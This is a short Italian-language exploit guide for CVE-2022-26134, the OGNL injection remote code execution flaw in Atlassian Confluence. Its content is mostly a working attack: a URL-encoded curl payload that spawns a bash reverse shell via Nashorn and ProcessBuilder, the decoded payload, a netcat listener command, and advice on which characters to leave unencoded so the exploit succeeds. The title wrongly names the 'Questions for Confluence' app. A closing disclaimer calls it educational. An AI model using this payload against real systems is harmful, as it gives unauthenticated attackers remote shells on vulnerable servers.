
Sfruttamento attivo dell'app Questions for Confluence di Atlassian CVE-2022-26134
CVE-2022-26134 è una vulnerabilità critica di Esecuzione di codice in remoto (RCE) che colpisce Atlassian Confluence. Questa vulnerabilità consente ad attaccanti non autenticati di eseguire codice arbitrario iniettando espressioni OGNL negli endpoint vulnerabili.
Il seguente comando CURL dimostra lo sfruttamento attivo di questa vulnerabilità, utilizzando il motore Nashorn di Java per eseguire una reverse shell:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
Quando si apportano queste modifiche, bisogna anche tenere conto della codifica URL. La stringa del payload nel proof-of-concept non è completamente codificata in URL. Alcuni caratteri (in particolare ".", "-" e "/") non sono codificati. Anche se non è sempre così, per questo exploit ciò risulta importante per il funzionamento del payload. Se uno qualsiasi di questi caratteri viene codificato, il server analizzerà l'URL in modo diverso e il payload potrebbe non essere eseguito. Questo significa che non possiamo applicare la codifica URL all'intero payload dopo averlo modificato.
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
Questa documentazione è solo a scopo didattico. Lo sfruttamento non autorizzato dei sistemi è illegale e può comportare gravi conseguenze. Ottieni sempre la dovuta autorizzazione prima di condurre valutazioni di sicurezza.